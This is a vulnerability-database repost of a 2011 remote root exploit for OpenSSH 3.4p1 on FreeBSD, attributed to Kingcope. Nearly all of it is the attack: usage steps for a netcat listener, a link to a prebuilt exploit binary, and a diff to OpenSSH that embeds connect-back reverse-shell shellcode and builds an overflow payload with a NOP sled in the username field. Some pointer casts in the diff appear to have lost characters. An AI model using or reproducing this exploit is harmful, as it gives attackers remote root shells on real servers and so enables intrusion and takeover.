Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26613
HistoryJul 06, 2011 - 12:00 a.m.

Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)

2011-07-0600:00:00
vulners.com
46
JSON

OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011

Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z <yourip> <target>
setup a netcat, port 443 on yourip first

a statically linked linux binary of the exploit can be found below
attached is a diff to openssh-5.8p2.

the statically linked binary can be downloaded from
http://isowarez.de/ssh_0day

I know these versions are really old, some seem to run
that tough.

-Cheers, King "the archaeologist" Cope

diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
149a150
> char *myip;
195a197,203
> "OpenSSH FreeBSD Remote Root Exploit\n"
> "By Kingcope\n"
> "Year 2011\n\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"
> "run like ./ssh -1 -z <yourip> <target>\n"
> "setup a netcat, port 443 on yourip first\n\n"
299c307
< while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"

> while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
335a344,346
> break;
> case 'z':
> myip = optarg;
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,719
> //IP=\xc0\xa8\x20\x80
> #define IPADDR "\xc0\xa8\x20\x80"
> #define PORT "\x27\x10" /* htons(10000) */
>
> char sc[] =
> "\x90\x90"
> "\x90\x90"
> "\x31\xc9" // xor ecx, ecx
> "\xf7\xe1" // mul ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x51" // push ecx
> "\xb0\x61" // mov al, 97
> "\xcd\x80" // int 80h
> "\x89\xc3" // mov ebx, eax
> "\x68"IPADDR // push dword 0101017fh
> "\x66\x68"PORT // push word 4135
> "\x66\x51" // push cx
> "\x89\xe6" // mov esi, esp
> "\xb2\x10" // mov dl, 16
> "\x52" // push edx
> "\x56" // push esi
> "\x50" // push eax
> "\x50" // push eax
> "\xb0\x62" // mov al, 98
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xb0\x5a" // mov al, 90
> "\x49" // dec ecx
> "\x51" // push ecx
> "\x53" // push ebx
> "\x53" // push ebx
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xe2\xf5" // loop -10
> "\x51" // push ecx
> "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
> "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
> "\x89\xe3" // mov ebx, esp
> "\x51" // push ecx
> "\x54" // push esp
> "\x53" // push ebx
> "\x53" // push ebx
> "\xb0\xc4\x34\xff"
> "\xcd\x80"; // int 80h
>
>
> extern char *myip;
>
678a731,748
>
> char buffer[100000];
>
> printf("OpenSSH Remote Root Exploit\n");
> printf("By Kingcope\n");
> printf("Year 2011\n\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n");
> printf("Connect back to: %s:443\n", myip);
>
> ((unsigned long)(sc + 21)) = inet_addr(myip);
> ((unsigned short)(sc + 27)) = htons(443);
>
> memset(buffer, 'V', 8096);
> memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
> memset(buffer+28, '\x90', 65535);
> memcpy(buffer+28+65535, sc, sizeof(sc));
> server_user=buffer;

JSON